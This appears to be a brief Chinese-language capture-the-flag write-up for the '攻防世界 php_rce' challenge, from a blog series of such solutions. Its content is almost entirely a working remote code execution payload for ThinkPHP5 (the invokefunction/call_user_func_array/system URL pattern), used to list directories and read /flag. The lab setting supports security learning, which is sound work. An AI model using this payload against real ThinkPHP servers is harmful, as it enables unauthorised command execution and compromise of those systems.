攻防世界(四)php_rce

攻防世界系列:php_rce

1.打开题目

看到这个还是很懵的,点开任意连接都是真实的场景。

攻防世界(四)php_rce

2.ThinkPHP5,这里我们需要知道它存在

远程代码执行的漏洞。

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(命令)

ls查看

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

攻防世界(四)php_rce

上一级 ls ../

攻防世界(四)php_rce

根目录下 ls /

攻防世界(四)php_rce

发现 flag打开flag   cat /flag

攻防世界(四)php_rce

上一篇:攻防世界web进阶区(1)


下一篇:攻防世界Web刷题记录(进阶区)